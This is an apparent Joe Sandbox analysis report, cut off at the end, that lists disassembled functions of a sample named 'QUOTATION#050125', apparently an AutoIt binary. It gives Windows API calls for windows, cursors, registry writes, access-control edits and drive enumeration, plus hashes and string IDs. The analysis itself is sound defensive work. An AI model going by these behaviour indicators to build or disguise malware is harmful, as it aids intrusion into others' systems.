                                                                                      • GetClientRect.USER32(00000000,?), ref: 0014290C
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00142955
                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00142964
                                                                                      • GetStockObject.GDI32(00000011), ref: 00142974
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00142978
                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00142988
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00142991
                                                                                      • DeleteDC.GDI32(00000000), ref: 0014299A
                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001429C6
                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 001429DD
                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00142A1D
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00142A31
                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00142A42
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00142A77
                                                                                      • GetStockObject.GDI32(00000011), ref: 00142A82
                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00142A8D
                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00142A97
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                      • API String ID: 2910397461-517079104
                                                                                      • Opcode ID: e1eb5a711548eb622f23fb6431964f457ef3011db29f117bf7ca2ec293040e3b
                                                                                      • Instruction ID: 19d972074b38e38aa07cca1a40d5eff3890e5c26af8a50782d8d77fb41b9c231
                                                                                      • Opcode Fuzzy Hash: e1eb5a711548eb622f23fb6431964f457ef3011db29f117bf7ca2ec293040e3b
                                                                                      • Instruction Fuzzy Hash: D9B13C71A00615AFEB14DF68CC86FAE7BB9FB08711F004519F915EB6A1D774AD80CB90
                                                                                      Function 00134ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00134AED
                                                                                      • GetDriveTypeW.KERNEL32(?,0015CB68,?,\\.\,0015CC08), ref: 00134BCA
                                                                                      • SetErrorMode.KERNEL32(00000000,0015CB68,?,\\.\,0015CC08), ref: 00134D36
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveType
                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                      • API String ID: 2907320926-4222207086
                                                                                      • Opcode ID: f627558fc0a7ef8e01b2cc1fdc0c6da525ecd9d83aa8beb7421ae30155397884
                                                                                      • Instruction ID: 998e03fb4a306c50beadfce79322d0515ef682594c7de93f43e773dff12036af
                                                                                      • Opcode Fuzzy Hash: f627558fc0a7ef8e01b2cc1fdc0c6da525ecd9d83aa8beb7421ae30155397884
                                                                                      • Instruction Fuzzy Hash: D661B030605205DFCB08EF64CA82EADB7A0EB04340F249519F846AB692DB76FE45DF81
                                                                                      Function 001573E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000012), ref: 00157421
                                                                                      • SetTextColor.GDI32(?,?), ref: 00157425
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0015743B
                                                                                      • GetSysColor.USER32(0000000F), ref: 00157446
                                                                                      • CreateSolidBrush.GDI32(?), ref: 0015744B
                                                                                      • GetSysColor.USER32(00000011), ref: 00157463
                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00157471
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00157482
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0015748B
                                                                                      • SelectObject.GDI32(?,?), ref: 00157498
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 001574B7
                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001574CE
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 001574DB
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0015752A
                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00157554
                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00157572
                                                                                      • DrawFocusRect.USER32(?,?), ref: 0015757D
                                                                                      • GetSysColor.USER32(00000011), ref: 0015758E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00157596
                                                                                      • DrawTextW.USER32(?,001570F5,000000FF,?,00000000), ref: 001575A8
                                                                                      • SelectObject.GDI32(?,?), ref: 001575BF
                                                                                      • DeleteObject.GDI32(?), ref: 001575CA
                                                                                      • SelectObject.GDI32(?,?), ref: 001575D0
                                                                                      • DeleteObject.GDI32(?), ref: 001575D5
                                                                                      • SetTextColor.GDI32(?,?), ref: 001575DB
                                                                                      • SetBkColor.GDI32(?,?), ref: 001575E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                      • String ID:
                                                                                      • API String ID: 1996641542-0
                                                                                      • Opcode ID: 07111afc8469b834f44937316f199bfd00968ec76c73cecdca06ffce7b605b8f
                                                                                      • Instruction ID: 25e42a27f3b71664d526bb835423b42d41127c5a032021fce651c8bedc5e7b25
                                                                                      • Opcode Fuzzy Hash: 07111afc8469b834f44937316f199bfd00968ec76c73cecdca06ffce7b605b8f
                                                                                      • Instruction Fuzzy Hash: 13613B72904318EFDB019FA4EC49AEEBFB9EB08322F114115F915AB2E1D7759980CB90
                                                                                      Function 00150FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 00151128
                                                                                      • GetDesktopWindow.USER32 ref: 0015113D
                                                                                      • GetWindowRect.USER32(00000000), ref: 00151144
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00151199
                                                                                      • DestroyWindow.USER32(?), ref: 001511B9
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001511ED
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0015120B
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0015121D
                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00151232
                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00151245
                                                                                      • IsWindowVisible.USER32(00000000), ref: 001512A1
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001512BC
                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001512D0
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 001512E8
                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 0015130E
                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00151328
                                                                                      • CopyRect.USER32(?,?), ref: 0015133F
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 001513AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                      • String ID: ($0$tooltips_class32
                                                                                      • API String ID: 698492251-4156429822
                                                                                      • Opcode ID: 81e81707e42c2c5c192aa5265c2fc888cdb9e0bb677eb29d19ed63df39699e03
                                                                                      • Instruction ID: e569b84d83ba31c074701402a7c62c3421f1caa326d5d55af9177731a0552f2a
                                                                                      • Opcode Fuzzy Hash: 81e81707e42c2c5c192aa5265c2fc888cdb9e0bb677eb29d19ed63df39699e03
                                                                                      • Instruction Fuzzy Hash: 22B15771604341EFD705DF64C885BAABBE4FF88351F00891CF9A99B2A2D771E849CB91
                                                                                      Function 000D8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000D8968
                                                                                      • GetSystemMetrics.USER32(00000007), ref: 000D8970
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000D899B
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 000D89A3
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 000D89C8
                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000D89E5
                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000D89F5
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000D8A28
                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000D8A3C
                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 000D8A5A
                                                                                      • GetStockObject.GDI32(00000011), ref: 000D8A76
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 000D8A81
                                                                                        • Part of subcall function 000D912D: GetCursorPos.USER32(?), ref: 000D9141
                                                                                        • Part of subcall function 000D912D: ScreenToClient.USER32(00000000,?), ref: 000D915E
                                                                                        • Part of subcall function 000D912D: GetAsyncKeyState.USER32(00000001), ref: 000D9183
                                                                                        • Part of subcall function 000D912D: GetAsyncKeyState.USER32(00000002), ref: 000D919D
                                                                                      • SetTimer.USER32(00000000,00000000,00000028,000D90FC), ref: 000D8AA8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                      • String ID: AutoIt v3 GUI
                                                                                      • API String ID: 1458621304-248962490
                                                                                      • Opcode ID: 1f78814a1e22475077a8b61667a4015b93e3a52c6824e92c2c763fb39e0d9543
                                                                                      • Instruction ID: 645244f3f7e8e79d5ac68d25678058ebd5b2a51b972d79b111b419c0005ef56b
                                                                                      • Opcode Fuzzy Hash: 1f78814a1e22475077a8b61667a4015b93e3a52c6824e92c2c763fb39e0d9543
                                                                                      • Instruction Fuzzy Hash: C2B16F75A0030AEFDB14DFA8CC55BEE7BB5FB48315F10412AFA15AB290DB70A981CB51
                                                                                      Function 00120D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 001210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00121114
                                                                                        • Part of subcall function 001210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121120
                                                                                        • Part of subcall function 001210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 0012112F
                                                                                        • Part of subcall function 001210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121136
                                                                                        • Part of subcall function 001210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0012114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00120DF5
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00120E29
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00120E40
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00120E7A
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00120E96
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00120EAD
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00120EB5
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00120EBC
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00120EDD
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00120EE4
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00120F13
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00120F35
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00120F47
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120F6E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120F75
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120F7E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120F85
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120F8E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120F95
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00120FA1
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120FA8
                                                                                        • Part of subcall function 00121193: GetProcessHeap.KERNEL32(00000008,00120BB1,?,00000000,?,00120BB1,?), ref: 001211A1
                                                                                        • Part of subcall function 00121193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00120BB1,?), ref: 001211A8
                                                                                        • Part of subcall function 00121193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00120BB1,?), ref: 001211B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: da880f43b62944f5c6a9a5d1690f618fa77749f5845f190df08a65cf3efe32e0
                                                                                      • Instruction ID: 19652e365b2a03c1d3318dc9a9e76091de2655cdd5446f682e5a368ccdf26ebf
                                                                                      • Opcode Fuzzy Hash: da880f43b62944f5c6a9a5d1690f618fa77749f5845f190df08a65cf3efe32e0
                                                                                      • Instruction Fuzzy Hash: E3717D7290031AEFDF219FA4ED44BAEBBB8FF08311F044215F919A6192D7319955CBA0
                                                                                      Function 00150241 Relevance: 28.4, APIs: 3, Strings: 13, Instructions: 391windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 001502E5
                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001504C5
                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00150504
                                                                                        • Part of subcall function 0012223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00122258
                                                                                        • Part of subcall function 0012223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0012228A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpper
                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                      • API String ID: 3391685005-719923060
                                                                                      • Opcode ID: 11069395ebc1aece81e77cef09fc22b7205090495de6bd0c3d63fc2980fc9a66
                                                                                      • Instruction ID: 86faf56df8482f9db5729510d1396a03423cff82021908b26d9a4039e94887e0
                                                                                      • Opcode Fuzzy Hash: 11069395ebc1aece81e77cef09fc22b7205090495de6bd0c3d63fc2980fc9a66
                                                                                      • Instruction Fuzzy Hash: 60E19C31208301CFC715EF64C55196EB3E6BF98315B54496DF8A6AB3A2DB30EE49CB81
                                                                                      Function 0013FE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 0013FE27
                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0013FE32
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0013FE3D
                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 0013FE48
                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0013FE53
                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0013FE5E
                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0013FE69
                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 0013FE74
                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 0013FE7F
                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0013FE8A
                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 0013FE95
                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 0013FEA0
                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0013FEAB
                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 0013FEB6
                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0013FEC1
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0013FECC
                                                                                      • GetCursorInfo.USER32(?), ref: 0013FEDC
                                                                                      • GetLastError.KERNEL32 ref: 0013FF1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                      • String ID:
                                                                                      • API String ID: 3215588206-0
                                                                                      • Opcode ID: 46e601b02e6e887497568bcdaf9b34c5cc6ee5fdec8574cf1ce6d2717dc663ba
                                                                                      • Instruction ID: 8227b8106438cdfcf4e1ad1017a549735355ed5643a1fb5fb64055f5f4fa9014
                                                                                      • Opcode Fuzzy Hash: 46e601b02e6e887497568bcdaf9b34c5cc6ee5fdec8574cf1ce6d2717dc663ba
                                                                                      • Instruction Fuzzy Hash: 5D4124B1D04319AADB109FBA8C89C5EBFE8FF04754B50452AE51DEB281DB78D901CF91
                                                                                      Function 0014C3B7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 495registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014C4BD
                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0015CC08,00000000,?,00000000,?,?), ref: 0014C544
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0014C5A4
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0014C6B2
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0014C7C1
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0014C84D
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0014C881
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014C88E
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0014C960
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$Close$ConnectCreateRegistry
                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                      • API String ID: 492116352-966354055
                                                                                      • Opcode ID: eb2345ec7cae7fc0ec9b810f5e689887c5f753fdb7f9ce7c2182d8ae652db9e7
                                                                                      • Instruction ID: e6687634511ce4ecaddcc61b7109a915ac0af0a325da96162150e83c2df140d9
                                                                                      • Opcode Fuzzy Hash: eb2345ec7cae7fc0ec9b810f5e689887c5f753fdb7f9ce7c2182d8ae652db9e7
                                                                                      • Instruction Fuzzy Hash: C91224356046019FD754DF14C891F6EB7E5EF88724F15889CF88A9B2A2DB31ED41CB81
                                                                                      Function 00125A1B Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000063), ref: 00125A2E
                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00125A40
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00125A57
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00125A6C
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00125A72
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00125A82
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00125A88
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00125AA9
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00125AC3
                                                                                      • GetWindowRect.USER32(?,?), ref: 00125ACC
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00125B6F
                                                                                      • GetDesktopWindow.USER32 ref: 00125B75
                                                                                      • GetWindowRect.USER32(00000000), ref: 00125B7C
                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00125BD3
                                                                                      • GetClientRect.USER32(?,?), ref: 00125BE0
                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00125C05
                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00125C2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
